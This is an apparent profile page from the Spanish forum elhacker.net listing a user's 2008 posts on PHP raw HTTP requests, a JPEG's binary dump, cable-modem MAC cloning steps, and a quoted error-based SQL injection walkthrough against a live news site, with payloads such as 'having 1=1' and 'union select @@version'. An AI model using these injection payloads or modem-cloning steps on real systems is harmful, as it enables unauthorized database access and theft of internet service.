elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.



Tema destacado: AIO elhacker.NET 2021 Compilacin herramientas anlisis y desinfeccin malware


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16
31  Programacin / PHP / sobre sessiones en: 8 Noviembre 2008, 18:42 pm
hay alguna forma de obtener la session de un sitio..?
32  Programacin / PHP / ver codigo de una imagen en: 7 Noviembre 2008, 14:29 pm
hola.. me gustaria saber como puedo ver el codigo de una imagen por ejemplo:

si damos clic aqui

http://www.gopenenterprise.com/store/images/linux.jpg

miraremos el logo de linux.. ahora en el navegador den ver codigo fuente y le saldra un monton de codigos por ejemplo

Código:
�JFIF�������C�

(1#%(:3=<9387@H\N@DWE78PmQW_bghg>Mqypdx\egc�C//cB8Bcccccccccccccccccccccccccccccccccccccccccccccccccc�n7"�����������������;�����!1"AQ2aq#35BR4Tbs$Sr���������������&��������!12"AQaBq� ��?�@��������������������������������������A$��������������������������������������$@���������������SꕗN0V {cJ\]]oTcEZ_Wi7zy^ưc~jiM'".P̭$=32#NMS[G
=k{Iq,NY74]Լ+H ��������������A$�������������<qъݳѬqޮ![܏*zqKUucQƯ[Gp���i$A Zch,[7MŮEtuk}vm'
ۯOi�{Ox=}:kxy_^
�������������I�������������U6YLvH[~+M KsizL{0�W�
ț[oЦ}V<Wde;+sq <kt=M7cLd%%=4kd:-ҿHŲRR[������������ �������������G^c;qLWshS6یb�SWͽg<=S~_$/Uӵ&3)u,F\taKj\Rݯ+J>{
h):w9º^=:eVJ)e4a~


yo lo estaba haciendo con este trozo de codigo...



Código:
$x1sub = fsockopen("www.gopenenterprise.com", 80);

$x1sub1 = "GET /store/images/linux.jpg HTTP/1.1\r\n";
$x1sub1 .= "Host: www.gopenenterprise.com\r\n";
$x1sub1 .= "Connection: Close\r\n\r\n";

   fwrite($x1sub, $x1sub1);
  while (!feof($x1sub)) {
$codigo.= fgets($x1sub, 128);
    }



fclose ($x1sub);
echo $codigo;
pero en ves que me muestre el codigo me sale un error

como podria solucionar eso..?
33  Programacin / Programacin Visual Basic / Re: [Tutorial] Enviando e-mail con VB6 en: 4 Octubre 2008, 19:36 pm
hosting que acepta la funcion mail()


www.t35.com
www.idoo.com


los que e usado


 ;D ;D ;D
34  Informtica / Tutoriales - Documentacin / Re: Pasos detallados para clonar un Cablemodem en: 16 Junio 2008, 19:45 pm
4 Ya que crearon el vsWorks.st, abren el sbrider, y agregan ese archivo (el vsWorks.st), de manera
que haya 3 archivos, que serian, el "netboot.exe", readme.txt, y el archivo agregado, el vsWorks.st

5 Ahora, abren el netboot.exe, y seleccionan, las casillas "Reset Modem Before Booting", Enable FTP Server,
y la opcion de "Auto IP(2k and XP only), y donde dice "Adapter", seleccionan su tarjeta de red, que este conectada a Internet.

6 Ahora, le dan click a donde dice "boot over network", y esperan como 2 minutos.

Abajo del netboot, les saldra el procedimiento que hace el programa, y cuando vean que sale, el "Ftp Disconnect" hacen el ultimo paso.

7 Cuando les salga ftp disconnect y su modem, este en "power", se meten rapidamente a la pagina http://192.168.100.1/07-nuevamacaddress

NOTA: Si se meten a la pagina, y el fondo sale de color negro, que es lo como debe de salir, ya estara clonado.

Para verificar que este clonado se meten a http://192.168.100.1/address.html, y veran que la mac, ya no es la misma.



hola brother... fijate que tengo todos los pasos hechos pero no me funciona el cambio de mac..... me sale el fondo negro y todo.. pero me gustaria saber como cambio la mac... si hay mas opciones para cambiar la mac y cuantas veces puedo cambiarle la mac. el modem es motorola sb4100


saludos y gracias de antemano xDDDDD

35  Programacin / PHP / Re: envio de datos GET y POST (finales) en: 25 Abril 2008, 19:48 pm
fijate que lo hice con Snoopy, y no me funciono..
36  Programacin / PHP / Re: envio de datos GET y POST (finales) en: 24 Abril 2008, 22:12 pm
ya le entendi.. pero para enviar los datos como lo puso Mugiwara

Código:
fputs($fp, "Content-length: " . strlen($parametros) . "\r\n");
es parte no le entiendo
37  Programacin / PHP / Re: envio de datos GET y POST (finales) en: 24 Abril 2008, 19:52 pm
un ejemplo con cURL o la clase Snoopy....  por favor...


pero mi pregunta es de donde sacaste

Código:
fputs($fp, "POST /login.php HTTP/1.1\r\n");
fputs($fp, "Host: www.ejemplo.com\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($parametros) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");

una explicadita para saber como es..
38  Programacin / PHP / envio de datos GET y POST (finales) en: 23 Abril 2008, 07:02 am
bueno en teoria lo dije en este tema http://foro.elhacker.net/index.php/topic,206863.0.html pero ahora me gustaria que comenzaramos analizarlo bien, que cambia, que hay que agregarle, que esta de mas  para enviar los datos perfectos



Ejemplos:

login.php por ejemplo
Código:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>localhost</title>
</head>

<body>
<form id="datos" name="datos" method="post" action="">
  <label>
  <div align="center"> <?php
 
 $user=trim($_POST["user"]);
 $pass=trim($_POST["pass"]);
 
 //aqui el script ya sea de un foro o cualquier sitio
 //para loguiarse con las variables user y pass
 
 
 
  ?> <br />
  <table width="237" height="94" border="1">
      <tr>
        <td width="43">&nbsp;</td>
        <td width="132"><div align="center">user
          <input name="user" type="text" id="user" size="10" />
            <br />
          pass
          <input name="pass" type="text" id="pass" size="10" />
          <br />
          <input type="submit" name="enviar" id="enviar" value="Enviar" />
          </div></td>
        <td width="40">&nbsp;</td>
      </tr>
    </table>
    <br />
</div></label>
</form>
</body>
</html>




ahora los el envio de datos seria asi:


Código:
<?php
$da = fsockopen("www.example.com", 80);

    $salida = "GET /login.php?user=satan69&pass=satan69 HTTP/1.1\r\n";
    $salida .= "Host: www.example.com\r\n";
    $salida .= "Connection: Close\r\n\r\n";

    fwrite($da, $salida);
    fclose($da);

?>


ese seria con metodo GET... ahora mi pregunta seria con metodo POST.. como seria..? poniendo el ejemplo del formulario de arriba


ojo: no quiero hacer dao... simplemente saber como trabajan....
39  Seguridad Informtica / Nivel Web / Re: Duda con SQL injection en: 22 Abril 2008, 03:57 am
Heme aqui de nuevo ( que desgracia eh  :( ?)

Bueno, vamos a ver:

Consegui sacar el nombre de una columna de una web(trabala con MS SQL), y bueno, probe algo mas, pero me quede encallado. Primero hice:

id=456+having+1=1

Y me produjo el siguiente error:

Código:
[La columna 'noticias.ANTETITULO' de la lista de seleccin no es vlida, porque no est contenida en una funcin de agregado y no hay clusula GROUP BY./code]

Asi que luego hice:

id=456+group+by+noticias.ANTETITULO+having+1=1

Y me salio:

[code]Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]La columna 'noticias.TITULO' de la lista de seleccin no es vlida, porque no est contenida en una funcin de agregado ni en la clusula GROUP BY.

/web/sp/index.asp, line 11

Asi que fui rellenando con group by, hasta que al tratar de meter la sentencia:

Código:
id=456+group+by+noticias.ANTETITULO+,noticias.TITULO+,noticias.ENTRADILLA+,noticias.FECHA+,noticias.HEAD,+noticias.TEXTO+having+1=1--

Me produjo el siguiente error:

Código:
[Microsoft][ODBC SQL Server Driver][SQL Server]No se puede comparar ni ordenar los tipos de datos text, ntext e image, excepto cuando se utiliza el operador IS NULL o LIKE.

Y ahi me quede, intente sacar la version con

Código:
id=456+union+select+@@version,1,1,1,1

Y me dijo:

Código:
[Microsoft][ODBC SQL Server Driver][SQL Server]Error de sintaxis al convertir el valor varchar 'Cinco organizaciones ecologistas denuncian la especulacin urbanstica como la principal amenaza del medio ambiente en Espaa' para una columna de tipo de datos int.

Y nada mas, me quede ahi estancado, a ver si alguien puede echarme una mano, solo orientarme un poco(no me gusta que me hagan las cosas), para donde puedo ir o cuales pueden ser mis movimientos siguientes.

Gracias de antemano, y un saludo

[/code]


es asi la onda:

Código:
id=1' having 1=1--

ayi tira el error... y la mayor veces te muestra los campos y el nombre de la tabla
40  Programacin / Programacin Visual Basic / Re: LaoTools Msn V1.0 en: 10 Abril 2008, 21:17 pm
anoon.. chiva... nos pueden joder la pc... mejor pone el codigo entre
Código:

asi miramos como funciona ;D ;D ;D
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines